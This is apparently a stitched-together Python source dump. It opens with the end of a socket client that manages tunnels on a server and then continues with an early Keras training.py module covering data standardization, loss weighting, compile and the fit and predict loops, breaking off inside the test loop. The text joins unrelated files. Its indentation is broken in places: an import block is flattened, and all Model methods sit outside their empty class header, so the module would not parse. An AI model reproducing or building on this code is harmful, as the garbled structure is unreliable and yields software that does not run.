            while True:
                cmd = Command.unpack(self._socket, timeout=1.0)
                if cmd.command == Command.COMMAND_NOOP:
                    # NOOP terminates the reply stream.
                    break
                reply.append(cmd)
            return reply
        finally:
            self._lock.release()

    def ping(self):
        # Round-trip a NOOP to verify the server is alive.
        self._send_command(Command(Command.COMMAND_NOOP))

    def add_tunnel(self, tunnel):
        self._send_command(
            TunnelCommand(
                Command.COMMAND_ADD, tunnel)
        )

    def del_tunnel(self, tunnel):
        self._send_command(
            TunnelCommand(Command.COMMAND_DEL, tunnel)
        )

    def list_tunnels(self):
        """Return the tunnels currently managed by the server."""
        reply = self._send_command(
            ListCommand(Command.COMMAND_LIST)
        )
        return [r.tunnel for r in reply]
|
training.py | from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import threading
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None, check_batch_dim=True,
                           exception_prefix=''):
    '''Users may pass data as a list of arrays, dictionary of arrays,
    or as a single array. We normalize this to an ordered list of
    arrays (same order as `names`), while checking that the provided
    arrays have shapes that match the network's expectations.

    # Arguments
        data: array, list of arrays, or dict mapping input name -> array.
        names: expected input names; defines the order of the result.
        shapes: optional expected shapes (one per name) to validate against.
        check_batch_dim: whether to also validate the first (batch) axis.
        exception_prefix: string included in error messages for context.

    # Returns
        List of arrays ordered like `names`, each made at least 2D.
    '''
    if type(data) is dict:
        # Re-order the dict values according to `names`.
        arrays = []
        for name in names:
            if name not in data:
                raise Exception('No data provided for "' +
                                name + '". Need data for each key in: ' +
                                str(data.keys()))
            arrays.append(data[name])
    elif type(data) is list:
        if len(data) != len(names):
            if len(data) > 0 and hasattr(data[0], 'shape'):
                # A list of arrays of the wrong length.
                raise Exception('Error when checking ' + exception_prefix +
                                ': the list of Numpy arrays '
                                'that you are passing to your model '
                                'is not the size the model expected. '
                                'Expected to see ' + str(len(names)) +
                                ' arrays but instead got '
                                'the following list of ' + str(len(data)) +
                                ' arrays: ' + str(data)[:200] +
                                '...')
            else:
                if len(names) == 1:
                    # Single input: accept a plain (nested) list of values.
                    data = [np.asarray(data)]
                else:
                    raise Exception('Error when checking ' + exception_prefix +
                                    ': you are passing a list as '
                                    'input to your model, '
                                    'but the model expects a '
                                    'a list of ' + str(len(names)) +
                                    ' Numpy arrays instead. '
                                    'The list you passed was: ' +
                                    str(data)[:200])
        arrays = data
    else:
        if not hasattr(data, 'shape'):
            raise Exception('Error when checking ' + exception_prefix +
                            ': data should be a Numpy array, '
                            'or list/dict of Numpy arrays. '
                            'Found: ' + str(data)[:200] + '...')
        if len(names) != 1:
            # case: model expects multiple inputs but only received
            # a single Numpy array
            raise Exception('The model expects ' + str(len(names)) +
                            ' input arrays, but only received one array. '
                            'Found: array with shape ' + str(data.shape))
        arrays = [data]

    # make arrays at least 2D
    for i in range(len(names)):
        array = arrays[i]
        if len(array.shape) == 1:
            array = np.expand_dims(array, 1)
            arrays[i] = array

    # check shapes compatibility
    if shapes:
        for i in range(len(names)):
            array = arrays[i]
            if len(array.shape) != len(shapes[i]):
                raise Exception('Error when checking ' + exception_prefix +
                                ': expected ' + names[i] +
                                ' to have ' + str(len(shapes[i])) +
                                ' dimensions, but got array with shape ' +
                                str(array.shape))
            for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
                if not j and not check_batch_dim:
                    # skip the first axis
                    continue
                if ref_dim:
                    # A falsy ref_dim (None/0) means "any size allowed".
                    if ref_dim != dim:
                        raise Exception('Error when checking ' + exception_prefix +
                                        ': expected ' + names[i] +
                                        ' to have shape ' + str(shapes[i]) +
                                        ' but got array with shape ' +
                                        str(array.shape))
    return arrays
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
    """Normalize user-provided weights to one entry per model output.

    Accepts None/empty, a single weight container, a list with one
    entry per output, or a dict keyed by output name.
    """
    if x_weight is None or len(x_weight) == 0:
        return [None] * len(output_names)
    if len(output_names) == 1:
        # Single-output models accept the weight container directly,
        # a one-element list, or a dict keyed by the output's name.
        if type(x_weight) is list and len(x_weight) == 1:
            return x_weight
        if type(x_weight) is dict and output_names[0] in x_weight:
            return [x_weight[output_names[0]]]
        return [x_weight]
    if type(x_weight) is list:
        if len(x_weight) != len(output_names):
            raise Exception('Provided `' + weight_type + '` was a list of ' +
                            str(len(x_weight)) +
                            ' elements, but the model has ' +
                            str(len(output_names)) + ' outputs. '
                            'You should provide one `' + weight_type + '`'
                            'array per model output.')
        return x_weight
    if type(x_weight) is dict:
        # Missing names map to None (no weighting for that output).
        return [x_weight.get(name) for name in output_names]
    raise Exception('The model has multiple outputs, so `' +
                    weight_type + '` '
                    'should be either a list of a dict. '
                    'Provided `' + weight_type +
                    '` type not understood: ' +
                    str(x_weight))
def standardize_class_weights(class_weight, output_names):
    """Normalize `class_weight` into one entry per model output."""
    return standardize_sample_or_class_weights(
        class_weight, output_names, 'class_weight')
def standardize_sample_weights(sample_weight, output_names):
    """Normalize `sample_weight` into one entry per model output."""
    return standardize_sample_or_class_weights(
        sample_weight, output_names, 'sample_weight')
def check_array_lengths(X, Y, W):
    """Validate that inputs, targets and sample weights agree on the
    number of samples (size of the first axis).

    # Arguments
        X: list of input arrays.
        Y: list of target arrays.
        W: list of sample-weight arrays.

    # Raises
        Exception: on any mismatch, naming the offending group.
    """
    set_x = {x.shape[0] for x in X}
    if len(set_x) != 1:
        raise Exception('All input arrays (x) should have '
                        'the same number of samples.')
    set_y = {y.shape[0] for y in Y}
    if len(set_y) != 1:
        raise Exception('All target arrays (y) should have '
                        'the same number of samples.')
    set_w = {w.shape[0] for w in W}
    if len(set_w) != 1:
        raise Exception('All sample_weight arrays should have '
                        'the same number of samples.')
    x_len = set_x.pop()
    y_len = set_y.pop()
    w_len = set_w.pop()
    if x_len != y_len:
        raise Exception('Input arrays should have '
                        'the same number of samples as target arrays. Found ' +
                        str(x_len) + ' input samples and ' +
                        str(y_len) + ' target samples.')
    if x_len != w_len:
        # Fixed copy-paste defect: this message previously said
        # "target samples" while actually reporting the sample_weight count.
        raise Exception('Sample_weight arrays should have '
                        'the same number of samples as input arrays. Found ' +
                        str(x_len) + ' input samples and ' +
                        str(w_len) + ' sample_weight samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
    """Sanity-check that each target array is compatible with its loss
    function and the shape of the corresponding model output.

    # Raises
        Exception: for `categorical_crossentropy` applied to 1-column
            targets, or for shape mismatches with losses that require
            target shape == output shape.
    """
    assert len(targets) == len(losses) == len(output_shapes)
    # Losses that require the target shape to match the output shape.
    # Fixed typo: this set previously contained 'mean_square_error',
    # which never matches the objective named 'mean_squared_error' and
    # silently disabled the check for MSE.
    key_losses = {'mean_squared_error',
                  'binary_crossentropy',
                  'categorical_crossentropy'}
    for y, loss, shape in zip(targets, losses, output_shapes):
        if loss.__name__ == 'categorical_crossentropy':
            if y.shape[1] == 1:
                raise Exception('You are passing a target array of shape ' + str(y.shape) +
                                ' while using as loss `categorical_crossentropy`. '
                                '`categorical_crossentropy` expects '
                                'targets to be binary matrices (1s and 0s) '
                                'of shape (samples, classes). '
                                'If your targets are integer classes, '
                                'you can convert them to the expected format via:\n'
                                '```\n'
                                'from keras.utils.np_utils import to_categorical\n'
                                'y_binary = to_categorical(y_int)\n'
                                '```\n'
                                '\n'
                                'Alternatively, you can use the loss function '
                                '`sparse_categorical_crossentropy` instead, '
                                'which does expect integer targets.')
        if loss.__name__ in key_losses and shape[1] is not None and y.shape[1] != shape[1]:
            raise Exception('A target array with shape ' + str(y.shape) +
                            ' was passed for an output of shape ' + str(shape) +
                            ' while using as loss `' + loss.__name__ + '`. '
                            'This loss expects '
                            'targets to have the same shape '
                            'as the output.')
def collect_metrics(metrics, output_names):
    """Expand the user-supplied `metrics` argument into a nested list
    with exactly one list of metrics per model output.

    A flat list applies every metric to every output; a dict maps
    output names to a metric or list of metrics.
    """
    if not metrics:
        return [[] for _ in output_names]
    if type(metrics) is list:
        # Copy per output so later mutation of one entry is isolated.
        return [copy.copy(metrics) for _ in output_names]
    if type(metrics) is dict:
        nested = []
        for name in output_names:
            entry = metrics.get(name, [])
            nested.append(entry if type(entry) is list else [entry])
        return nested
    raise Exception('Type of `metrics` argument not understood. '
                    'Expected a list or dictionary, found: ' +
                    str(metrics))
def collect_trainable_weights(layer):
    """Recursively gather the trainable weights of a layer or container.

    Containers (Sequential/Model/Graph) are walked into; a layer whose
    `trainable` attribute is False contributes nothing.
    """
    if not getattr(layer, 'trainable', True):
        return []
    kind = layer.__class__.__name__
    weights = []
    if kind in ('Sequential', 'Model'):
        for child in layer.layers:
            weights.extend(collect_trainable_weights(child))
    elif kind == 'Graph':
        for child in layer._graph_nodes.values():
            weights.extend(collect_trainable_weights(child))
    else:
        # Plain layer: take its own trainable weights.
        weights.extend(layer.trainable_weights)
    return weights
def batch_shuffle(index_array, batch_size):
    """Shuffle an index array batch-by-batch rather than element-wise.

    Useful for HDF5-backed data, where arbitrary indexing is not
    available: each batch keeps its internal order. Trailing items that
    do not fill a complete batch are re-appended, unshuffled, at the end.
    """
    batch_count = len(index_array) // batch_size
    cutoff = batch_count * batch_size
    # Stash the incomplete tail, shuffle the full batches as rows.
    tail = index_array[cutoff:]
    batches = index_array[:cutoff].reshape((batch_count, batch_size))
    np.random.shuffle(batches)
    return np.append(batches.flatten(), tail)
def make_batches(size, batch_size):
    """Return (start, end) index tuples covering `size` samples in
    consecutive batches of `batch_size`; the final batch may be short.
    """
    nb_batch = int(np.ceil(size / float(batch_size)))
    batches = []
    for i in range(nb_batch):
        start = i * batch_size
        batches.append((start, min(size, start + batch_size)))
    return batches
def slice_X(X, start=None, stop=None):
    """Slice an array-like, or every array-like in a list.

    - `slice_X(x, 2, 10)`   -> `x[2:10]`
    - `slice_X(x, indices)` -> `x[indices]` (fancy indexing)

    # Arguments
        start: integer start index, or a list/array of indices.
        stop: integer stop index; should be None when `start` is a
            list/array of indices.
    """
    fancy = hasattr(start, '__len__')
    if fancy and hasattr(start, 'shape'):
        # hdf5 datasets only support list objects as indices
        start = start.tolist()
    if type(X) == list:
        if fancy:
            return [x[start] for x in X]
        return [x[start:stop] for x in X]
    if fancy:
        return X[start]
    return X[start:stop]
def weighted_objective(fn):
    '''Transforms an objective function `fn(y_true, y_pred)`
    into a sample-weighted, cost-masked objective function
    `fn(y_true, y_pred, weights, mask)`.

    All tensor math goes through the backend `K`, so the returned
    function is symbolic (works for both Theano and TensorFlow).
    '''
    def weighted(y_true, y_pred, weights, mask=None):
        # score_array has ndim >= 2
        score_array = fn(y_true, y_pred)
        if mask is not None:
            # Cast the mask to floatX to avoid float64 upcasting in theano
            mask = K.cast(mask, K.floatx())
            # mask should have the same shape as score_array
            score_array *= mask
            # the loss per batch should be proportional
            # to the number of unmasked samples.
            score_array /= K.mean(mask)

        # reduce score_array to same ndim as weight array
        ndim = K.ndim(score_array)
        weight_ndim = K.ndim(weights)
        score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))

        # apply sample weighting
        if weights is not None:
            score_array *= weights
            # Rescale so that zero-weighted samples do not dilute the
            # mean over the batch.
            score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
        return K.mean(score_array)
    return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
                        sample_weight_mode=None):
    '''Performs weight input validation and standardization
    to a single sample-wise (or timestep-wise) weight array.

    # Arguments
        y: target Numpy array.
        sample_weight: per-sample (1D) or per-timestep (2D) weights.
        class_weight: dict mapping class index -> weight; only supported
            for targets of at most 2 dimensions.
        sample_weight_mode: None for sample-wise weights or "temporal"
            for timestep-wise weights.

    # Returns
        A Numpy weight array; all ones when no weighting is requested.
    '''
    if sample_weight_mode is not None:
        if sample_weight_mode != 'temporal':
            # Fixed message: previously started with an unbalanced quote
            # ('"sample_weight_mode should be ...').
            raise Exception('"sample_weight_mode" '
                            'should be None or "temporal". '
                            'Found: ' + str(sample_weight_mode))
        if len(y.shape) < 3:
            raise Exception('Found a sample_weight array for '
                            'an input with shape ' +
                            str(y.shape) + '. '
                            'Timestep-wise sample weighting (use of '
                            'sample_weight_mode="temporal") is restricted to '
                            'outputs that are at least 3D, i.e. that have '
                            'a time dimension.')
        if sample_weight is not None and len(sample_weight.shape) != 2:
            raise Exception('Found a sample_weight array with shape ' +
                            str(sample_weight.shape) + '. '
                            'In order to use timestep-wise sample weighting, '
                            'you should pass a 2D sample_weight array.')
    else:
        if sample_weight is not None and len(sample_weight.shape) != 1:
            raise Exception('Found a sample_weight array with shape ' +
                            str(sample_weight.shape) + '. '
                            'In order to use timestep-wise sample weights, '
                            'you should specify sample_weight_mode="temporal" '
                            'in compile(). If you just mean to use '
                            'sample-wise weights, make sure your '
                            'sample_weight array is 1D.')
    if sample_weight is not None:
        # These were bare asserts with a "TODO: proper error message";
        # replaced with real exceptions (asserts vanish under `python -O`).
        if len(sample_weight.shape) > len(y.shape):
            raise Exception('Found a sample_weight array with shape ' +
                            str(sample_weight.shape) + ' for a target with '
                            'shape ' + str(y.shape) + '. sample_weight cannot '
                            'have more dimensions than the target.')
        if y.shape[:sample_weight.ndim] != sample_weight.shape:
            raise Exception('Found a sample_weight array with shape ' +
                            str(sample_weight.shape) + ' that does not match '
                            'the leading dimensions of the target shape ' +
                            str(y.shape) + '.')
        return sample_weight
    elif isinstance(class_weight, dict):
        if len(y.shape) > 2:
            raise Exception('class_weight not supported for '
                            '3+ dimensional targets.')
        if y.shape[1] > 1:
            # One-hot (or multi-column) targets: weight by argmax class.
            y_classes = y.argmax(axis=1)
        elif y.shape[1] == 1:
            y_classes = np.reshape(y, y.shape[0])
        else:
            y_classes = y
        weights = np.asarray([class_weight[cls] for cls in y_classes])
        return weights
    else:
        # No weighting requested: uniform weights of the proper rank.
        if sample_weight_mode is None:
            return np.ones((y.shape[0],))
        else:
            return np.ones((y.shape[0], y.shape[1]))
def generator_queue(generator, max_q_size=10,
                    wait_time=0.05, nb_worker=1):
    '''Builds a threading queue out of a data generator.
    Used in `fit_generator`, `evaluate_generator`, `predict_generator`.

    # Returns
        A `(queue, stop_event)` tuple; setting the event stops the
        worker threads.
    '''
    q = queue.Queue()
    _stop = threading.Event()

    def data_generator_task():
        # Worker loop: pull from the shared generator while the queue
        # has room, otherwise back off for `wait_time` seconds.
        # NOTE(review): the qsize() check is racy with multiple workers,
        # so the queue may briefly exceed max_q_size.
        while not _stop.is_set():
            try:
                if q.qsize() < max_q_size:
                    try:
                        generator_output = next(generator)
                    except ValueError:
                        # NOTE(review): ValueError from the generator is
                        # silently retried — confirm which error this is
                        # meant to tolerate.
                        continue
                    q.put(generator_output)
                else:
                    time.sleep(wait_time)
            except Exception:
                # Any other failure stops all workers; the exception is
                # re-raised in this worker thread.
                _stop.set()
                raise

    generator_threads = [threading.Thread(target=data_generator_task)
                         for _ in range(nb_worker)]
    for thread in generator_threads:
        # Daemon threads so a hung generator cannot block interpreter exit.
        thread.daemon = True
        thread.start()
    return q, _stop
class Model(Container):
def compile(self, optimizer, loss, metrics=[], loss_weights=None,
            sample_weight_mode=None, **kwargs):
    '''Configures the model for training.

    # Arguments
        optimizer: str (name of optimizer) or optimizer object.
            See [optimizers](/optimizers).
        loss: str (name of objective function) or objective function.
            See [objectives](/objectives).
            If the model has multiple outputs, you can use a different loss
            on each output by passing a dictionary or a list of objectives.
        metrics: list of metrics to be evaluated by the model
            during training and testing.
            Typically you will use `metrics=['accuracy']`.
            To specify different metrics for different outputs of a
            multi-output model, you could also pass a dictionary,
            such as `metrics={'output_a': 'accuracy'}`.
        loss_weights: optional list or dict of scalar coefficients
            weighting each output's contribution to the total loss
            (defaults to 1. for every output).
        sample_weight_mode: if you need to do timestep-wise
            sample weighting (2D weights), set this to "temporal".
            "None" defaults to sample-wise weights (1D).
            If the model has multiple outputs, you can use a different
            `sample_weight_mode` on each output by passing a
            dictionary or a list of modes.
        kwargs: when using the Theano backend, these arguments
            are passed into K.function. Ignored for Tensorflow backend.
    '''
    self.optimizer = optimizers.get(optimizer)
    self.sample_weight_mode = sample_weight_mode
    self.loss = loss
    self.loss_weights = loss_weights

    # prepare loss weights: normalize to one scalar per output
    if loss_weights is None:
        loss_weights_list = [1. for _ in range(len(self.outputs))]
    elif type(loss_weights) is dict:
        for name in loss_weights:
            if name not in self.output_names:
                raise Exception('Unknown entry in loss_weights '
                                'dictionary: "' + name + '". '
                                'Only expected the following keys: ' +
                                str(self.output_names))
        loss_weights_list = []
        for name in self.output_names:
            # missing names default to weight 1.
            loss_weights_list.append(loss_weights.get(name, 1.))
    elif type(loss_weights) is list:
        if len(loss_weights) != len(self.outputs):
            # Fixed defect: this message previously printed `str(loss)`
            # instead of `str(loss_weights)`.
            raise Exception('When passing a list as loss_weights, '
                            'it should have one entry per model outputs. '
                            'The model has ' + str(len(self.outputs)) +
                            ' outputs, but you passed loss_weights=' +
                            str(loss_weights))
        loss_weights_list = loss_weights
    else:
        raise Exception('Could not interpret loss_weights argument: ' +
                        str(loss_weights))

    # prepare loss functions: normalize to one objective per output
    if type(loss) is dict:
        for name in loss:
            if name not in self.output_names:
                raise Exception('Unknown entry in loss '
                                'dictionary: "' + name + '". '
                                'Only expected the following keys: ' +
                                str(self.output_names))
        loss_functions = []
        for name in self.output_names:
            if name not in loss:
                raise Exception('Output "' + name +
                                '" missing from loss dictionary')
            loss_functions.append(objectives.get(loss[name]))
    elif type(loss) is list:
        if len(loss) != len(self.outputs):
            raise Exception('When passing a list as loss, '
                            'it should have one entry per model outputs. '
                            'The model has ' + str(len(self.outputs)) +
                            ' outputs, but you passed loss=' +
                            str(loss))
        loss_functions = [objectives.get(l) for l in loss]
    else:
        # single objective shared by every output
        loss_function = objectives.get(loss)
        loss_functions = [loss_function for _ in range(len(self.outputs))]
    self.loss_functions = loss_functions
    weighted_losses = [weighted_objective(fn) for fn in loss_functions]

    # prepare output masks
    masks = self.compute_mask(self.inputs, mask=None)
    if masks is None:
        masks = [None for _ in self.outputs]
    if type(masks) is not list:
        masks = [masks]

    # prepare sample weights: one placeholder per output, 2D when the
    # corresponding mode is 'temporal', 1D otherwise
    if type(sample_weight_mode) is dict:
        for name in sample_weight_mode:
            if name not in self.output_names:
                raise Exception('Unknown entry in '
                                'sample_weight_mode dictionary: "' +
                                name + '". '
                                'Only expected the following keys: ' +
                                str(self.output_names))
        sample_weights = []
        sample_weight_modes = []
        for name in self.output_names:
            if name not in sample_weight_mode:
                raise Exception('Output "' + name +
                                '" missing from sample_weight_modes '
                                'dictionary')
            if sample_weight_mode.get(name) == 'temporal':
                weight = K.placeholder(ndim=2, name=name + '_sample_weights')
                sample_weight_modes.append('temporal')
            else:
                weight = K.placeholder(ndim=1, name=name + '_sample_weights')
                sample_weight_modes.append(None)
            sample_weights.append(weight)
    elif type(sample_weight_mode) is list:
        if len(sample_weight_mode) != len(self.outputs):
            raise Exception('When passing a list as sample_weight_mode, ' +
                            'it should have one entry per model outputs. '
                            'The model has ' + str(len(self.outputs)) +
                            ' outputs, but you passed sample_weight_mode=' +
                            str(sample_weight_mode))
        sample_weights = []
        sample_weight_modes = []
        for mode, name in zip(sample_weight_mode, self.output_names):
            if mode == 'temporal':
                weight = K.placeholder(ndim=2, name=name + '_sample_weights')
                sample_weight_modes.append('temporal')
            else:
                weight = K.placeholder(ndim=1, name=name + '_sample_weights')
                sample_weight_modes.append(None)
            sample_weights.append(weight)
    else:
        if sample_weight_mode == 'temporal':
            sample_weights = [K.placeholder(ndim=2, name=name + '_sample_weights')
                              for name in self.output_names]
            sample_weight_modes = ['temporal' for name in self.output_names]
        else:
            sample_weights = [K.placeholder(ndim=1, name=name + '_sample_weights')
                              for name in self.output_names]
            sample_weight_modes = [None for name in self.output_names]
    self.sample_weight_modes = sample_weight_modes

    # prepare targets of model: one placeholder per output, matching the
    # output's rank
    self.targets = []
    for i in range(len(self.outputs)):
        shape = self.internal_output_shapes[i]
        name = self.output_names[i]
        self.targets.append(K.placeholder(ndim=len(shape), name=name + '_target'))

    # prepare metrics
    self.metrics_names = ['loss']
    self.metrics = []

    # compute total loss as the loss-weighted sum of per-output losses
    total_loss = None
    for i in range(len(self.outputs)):
        y_true = self.targets[i]
        y_pred = self.outputs[i]
        weighted_loss = weighted_losses[i]
        sample_weight = sample_weights[i]
        mask = masks[i]
        loss_weight = loss_weights_list[i]
        output_loss = weighted_loss(y_true, y_pred,
                                    sample_weight, mask)
        if len(self.outputs) > 1:
            # per-output losses are also reported as metrics
            self.metrics.append(output_loss)
            self.metrics_names.append(self.output_names[i] + '_loss')
        if total_loss is None:
            total_loss = loss_weight * output_loss
        else:
            total_loss += loss_weight * output_loss

    # add regularization penalties to the loss
    for r in self.regularizers:
        total_loss = r(total_loss)

    # list of same size as output_names.
    # contains tuples (metrics for output, names of metrics)
    nested_metrics = collect_metrics(metrics, self.output_names)
    for i in range(len(self.outputs)):
        y_true = self.targets[i]
        y_pred = self.outputs[i]
        output_metrics = nested_metrics[i]
        for metric in output_metrics:
            if metric == 'accuracy' or metric == 'acc':
                # custom handling of accuracy (because of class mode duality)
                output_shape = self.internal_output_shapes[i]
                if output_shape[-1] == 1:
                    # case: binary accuracy
                    self.metrics.append(metrics_module.binary_accuracy(y_true, y_pred))
                elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
                    # case: categorical accuracy with sparse targets
                    self.metrics.append(
                        metrics_module.sparse_categorical_accuracy(y_true, y_pred))
                else:
                    # case: categorical accuracy with dense targets
                    self.metrics.append(metrics_module.categorical_accuracy(y_true, y_pred))
                if len(self.output_names) == 1:
                    self.metrics_names.append('acc')
                else:
                    self.metrics_names.append(self.output_layers[i].name + '_acc')
            else:
                metric_fn = metrics_module.get(metric)
                self.metrics.append(metric_fn(y_true, y_pred))
                if len(self.output_names) == 1:
                    self.metrics_names.append(metric_fn.__name__)
                else:
                    self.metrics_names.append(self.output_layers[i].name + '_' + metric_fn.__name__)

    # prepare gradient updates and state updates
    # NOTE: the optimizer was already resolved at the top of compile();
    # re-getting it here is redundant but harmless, kept for parity.
    self.optimizer = optimizers.get(optimizer)
    self.total_loss = total_loss
    self.sample_weights = sample_weights

    # functions for train, test and predict will
    # be compiled lazily when required.
    # This saves time when the user is not using all functions.
    self._function_kwargs = kwargs
    self.train_function = None
    self.test_function = None
    self.predict_function = None
def _make_train_function(self):
    """Lazily build the backend function used for training steps.

    # Raises
        Exception: if `compile()` was never called (the attribute is
            created by compile()).
    """
    if not hasattr(self, 'train_function'):
        raise Exception('You must compile your model before using it.')
    if self.train_function is None:
        if self.uses_learning_phase:
            # learning phase flag is appended as the last input
            inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
        else:
            inputs = self.inputs + self.targets + self.sample_weights
        # get trainable weights
        trainable_weights = []
        for layer in self.layers:
            trainable_weights += collect_trainable_weights(layer)
        training_updates = self.optimizer.get_updates(trainable_weights, self.constraints, self.total_loss)
        updates = self.updates + training_updates
        # returns loss and metrics. Updates weights at each call.
        self.train_function = K.function(inputs,
                                         [self.total_loss] + self.metrics,
                                         updates=updates,
                                         **self._function_kwargs)
def _make_test_function(self):
    """Lazily build the backend function used for evaluation.

    # Raises
        Exception: if `compile()` was never called.
    """
    if not hasattr(self, 'test_function'):
        raise Exception('You must compile your model before using it.')
    if self.test_function is None:
        if self.uses_learning_phase:
            # learning phase flag is appended as the last input
            inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
        else:
            inputs = self.inputs + self.targets + self.sample_weights
        # return loss and metrics, no gradient updates.
        # Does update the network states.
        self.test_function = K.function(inputs,
                                        [self.total_loss] + self.metrics,
                                        updates=self.state_updates,
                                        **self._function_kwargs)
def _make_predict_function(self):
    """Lazily build the backend function used for inference.

    Unlike train/test, prediction does not require `compile()`: a
    missing attribute is initialized instead of raising.
    """
    if not hasattr(self, 'predict_function'):
        self.predict_function = None
    if self.predict_function is None:
        if self.uses_learning_phase:
            inputs = self.inputs + [K.learning_phase()]
        else:
            inputs = self.inputs
        # returns network outputs. Does not update weights.
        # Does update the network states.
        # _function_kwargs only exists after compile(), hence the getattr.
        kwargs = getattr(self, '_function_kwargs', {})
        self.predict_function = K.function(inputs,
                                           self.outputs,
                                           updates=self.state_updates,
                                           **kwargs)
def _fit_loop(self, f, ins, out_labels=[], batch_size=32,
              nb_epoch=100, verbose=1, callbacks=[],
              val_f=None, val_ins=None, shuffle=True,
              callback_metrics=[]):
    '''Abstract fit function for f(ins).
    Assume that f returns a list, labeled by out_labels.

    # Arguments
        f: Keras function returning a list of tensors
        ins: list of tensors to be fed to `f`
        out_labels: list of strings, display names of
            the outputs of `f`
        batch_size: integer batch size
        nb_epoch: number of times to iterate over the data
        verbose: verbosity mode, 0, 1 or 2
        callbacks: list of callbacks to be called during training
        val_f: Keras function to call for validation
        val_ins: list of tensors to be fed to `val_f`
        shuffle: whether to shuffle the data at the beginning of each epoch
        callback_metrics: list of strings, the display names of the metrics
            passed to the callbacks. They should be the
            concatenation of list the display names of the outputs of
            `f` and the list of display names of the outputs of `f_val`.

    # Returns
        `History` object.

    NOTE(review): `out_labels`, `callbacks` and `callback_metrics` use
    mutable default arguments; they are never mutated in place here, but
    None-defaults would be safer.
    '''
    do_validation = False
    if val_f and val_ins:
        do_validation = True
        if verbose:
            print('Train on %d samples, validate on %d samples' %
                  (len(ins[0]), len(val_ins[0])))

    nb_train_sample = len(ins[0])
    index_array = np.arange(nb_train_sample)

    # Wrap user callbacks with the standard logger/history callbacks.
    self.history = cbks.History()
    callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
    if verbose:
        callbacks += [cbks.ProgbarLogger()]
    callbacks = cbks.CallbackList(callbacks)

    # it's possible to callback a different model than self
    # (used by Sequential models)
    if hasattr(self, 'callback_model') and self.callback_model:
        callback_model = self.callback_model
    else:
        callback_model = self
    callbacks._set_model(callback_model)
    callbacks._set_params({
        'batch_size': batch_size,
        'nb_epoch': nb_epoch,
        'nb_sample': nb_train_sample,
        'verbose': verbose,
        'do_validation': do_validation,
        'metrics': callback_metrics,
    })
    callbacks.on_train_begin()
    callback_model.stop_training = False
    self.validation_data = val_ins

    for epoch in range(nb_epoch):
        callbacks.on_epoch_begin(epoch)
        if shuffle == 'batch':
            # batch-wise shuffle keeps HDF5-compatible contiguous slices
            index_array = batch_shuffle(index_array, batch_size)
        elif shuffle:
            np.random.shuffle(index_array)

        batches = make_batches(nb_train_sample, batch_size)
        for batch_index, (batch_start, batch_end) in enumerate(batches):
            batch_ids = index_array[batch_start:batch_end]
            try:
                if type(ins[-1]) is float:
                    # do not slice the training phase flag
                    ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
                else:
                    ins_batch = slice_X(ins, batch_ids)
            except TypeError:
                raise Exception('TypeError while preparing batch. '
                                'If using HDF5 input data, '
                                'pass shuffle="batch".')
            batch_logs = {}
            batch_logs['batch'] = batch_index
            batch_logs['size'] = len(batch_ids)
            callbacks.on_batch_begin(batch_index, batch_logs)
            outs = f(ins_batch)
            if type(outs) != list:
                outs = [outs]
            for l, o in zip(out_labels, outs):
                batch_logs[l] = o

            callbacks.on_batch_end(batch_index, batch_logs)

            epoch_logs = {}
            if batch_index == len(batches) - 1:  # last batch
                # validation runs once per epoch, after the final batch
                if do_validation:
                    # replace with self._evaluate
                    val_outs = self._test_loop(val_f, val_ins,
                                               batch_size=batch_size,
                                               verbose=0)
                    if type(val_outs) != list:
                        val_outs = [val_outs]
                    # same labels assumed
                    for l, o in zip(out_labels, val_outs):
                        epoch_logs['val_' + l] = o

        callbacks.on_epoch_end(epoch, epoch_logs)
        if callback_model.stop_training:
            # a callback (e.g. EarlyStopping) requested termination
            break
    callbacks.on_train_end()
    return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
    '''Abstract method to loop over some data in batches.

    # Arguments
        f: Keras function returning a list of tensors.
        ins: list of tensors to be fed to `f`.
        batch_size: integer batch size.
        verbose: verbosity mode.

    # Returns
        Array of predictions (if the model has a single output)
        or list of arrays of predictions
        (if the model has multiple outputs).
    '''
    nb_sample = len(ins[0])
    outs = []
    if verbose == 1:
        progbar = Progbar(target=nb_sample)
    batches = make_batches(nb_sample, batch_size)
    index_array = np.arange(nb_sample)
    for batch_index, (batch_start, batch_end) in enumerate(batches):
        batch_ids = index_array[batch_start:batch_end]
        # keep the exact `type(...) is float` check: the trailing entry is
        # the learning-phase flag only when it is a plain Python float
        if type(ins[-1]) is float:
            # do not slice the training phase flag
            ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
        else:
            ins_batch = slice_X(ins, batch_ids)
        batch_outs = f(ins_batch)
        if not isinstance(batch_outs, list):
            batch_outs = [batch_outs]
        if batch_index == 0:
            # pre-allocate full-size output arrays on the first batch,
            # inferring per-output shapes from that batch's results
            for batch_out in batch_outs:
                shape = (nb_sample,) + batch_out.shape[1:]
                outs.append(np.zeros(shape))
        for i, batch_out in enumerate(batch_outs):
            outs[i][batch_start:batch_end] = batch_out
        if verbose == 1:
            progbar.update(batch_end)
    if len(outs) == 1:
        return outs[0]
    return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
    '''Abstract method to loop over some data in batches.

    # Arguments
        f: Keras function returning a list of tensors.
        ins: list of tensors to be fed to `f`.
        batch_size: integer batch size.
        verbose: verbosity mode.

    # Returns
        Scalar loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    nb_sample = len(ins[0])
    outs = []
    if verbose == 1:
        progbar = Progbar(target=nb_sample)
    batches = make_batches(nb_sample, batch_size)
